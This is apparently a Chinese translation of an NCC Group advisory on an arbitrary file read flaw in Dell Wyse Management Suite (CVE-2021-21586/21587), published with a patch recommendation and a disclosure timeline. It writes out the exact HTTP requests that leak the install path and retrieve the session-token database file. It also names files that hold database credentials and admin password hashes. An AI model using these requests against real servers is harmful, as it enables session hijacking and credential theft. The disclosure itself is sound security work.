Dell Wyse管理套件任意文件读取漏洞CVE-2021-21586/21587

Dell Wyse管理套件任意文件读取漏洞CVE-2021-21586/21587

Dell Wyse管理套件任意文件读取漏洞CVE-2021-21586, CVE-2021-21587
Arbitrary File Read in Dell Wyse Management Suite (CVE-2021-21586, CVE-2021-21587)

供应商戴尔
供应商的URL dell.com/support/home/en-us/product-support/product/wyse-wms/drivers
受影响的版本 3.3版本之前
影响的系统所有
作者Stephen Tomkinson [email protected]
咨询URL/CVE标识符CVE-2021-21586, CVE-2021-21587
风险高-可能导致管理员会话被劫持

概括

瘦客户端通常位于安全环境中,因为它们的无盘操作可降低物理安全风险。

Wyse Management Suite (WMS) 充当戴尔瘦客户端硬件的中心枢纽,提供集中供应和配置。

Wyse Management Suite Web 界面和瘦客户端在启动时使用的配置服务是同一个 Web 应用程序的一部分,因此它是少数必须暴露给边缘网络连接的服务之一,即使在安全环境中也是如此。

在受影响的 WMS 版本上,可以从服务器检索任意文件,包括数据库凭据和包含管理用户会话数据的数据库文件。

漏洞位置

/ccm-web/image/os 端点接受这会从操作系统上的任何地方检索文件路径和文件名参数,例如:GET /ccm-web/image/os filePath=c:\windows\&fileName=win.ini

第二个端点有助于利用该端点,该端点通过详细的错误消息显示产品安装到的路径。这可以通过 PUT /ccm-web/image/pull/a/b 触发

影响

对瘦客户端及其网络连接具有物理访问权限的攻击者可以利用此漏洞访问整个瘦客户端资产的管理界面。管理界面包括重置 BIOS 密码和通过 VNC 远程投影终端屏幕等功能。

细节

Dell Wyse管理套件任意文件读取漏洞CVE-2021-21586/21587

对易受攻击的端点的访问使用 Wyse 设备 ID 进行身份验证。可以使用中间人攻击从配置的 Wyse 瘦客户端中检索此 ID。由于 WMS 用于提供 TLS 证书,瘦客户端和 WMS 之间的通信通常通过 TLS 执行,但不验证服务器证书。这可以由瘦客户端在引导过程早期检索的 DNS 或 DHCP 设置强制执行。

使用有效的设备 ID,可以向易受攻击的端点发出请求,首先获取软件的安装路径:

PUT /ccm-web/image/pull/a/b HTTP/1.1
Host: [redacted]
X-Stratus-device-id:wyse106[redacted]3149

这导致了以下错误,暴漏了内部路径

HTTP/1.1 500 
Cache-Control: private
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=4443165646FDA1BA417D08917BFD17C7; Path=/ccm-web; Secure; HttpOnly
X-Content-Type-Options: nosniff
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 107
Date: Fri, 16 Apr 2021 10:51:51 GMT
Connection: close

E:\Program Files\DELL\Software\repository\imagePull\staging\a\b (The system cannot find the path specified)

然后到易受攻击的端点检索文件:

GET /ccm-web/image/os?filePath=E:\Program Files\DELL\WMS\Database\SQL\stratus&fileName= persistentlogin.ibd HTTP/1.1
Host: [redacted]
X-Stratus-device-id:wyse106[redacted]3149

导致检索嵌入式 MySQL 数据库表,该表保存 WMS 的经过身份验证的用户的会话令牌。从该表中提取 JSESSIONID cookie 值允许会话劫持。

攻击者感兴趣的其他文件包括:

路径包含的文件
{安装路径}\Tomcat-9\webapps\ccm-web\WEB-INF\classes\bootstrap.properties 使用固定密钥加密的数据库凭据
{安装路径}\Database\SQL\stratus\person.ibdWMS 管理用户的密码,散列为 SHA256(MD5(pass),salt)

推荐

更新到 Wyse Management Suite 3.3 版。

供应商沟通

NCC Group通知供应商:2021年5月7日
更多细节:2021年5月11日
NCC Group发送请求信息:2021年5月11日
供应商确认漏洞:2021年5月20日
NCC Group请求更新日期:2021年6月18日
供应商回复日期:2021年6月18日
补丁和咨询发布:2021年7月6

谢谢

NCC Group的 Dave Cash

from

Leave a Reply

您的电子邮箱地址不会被公开。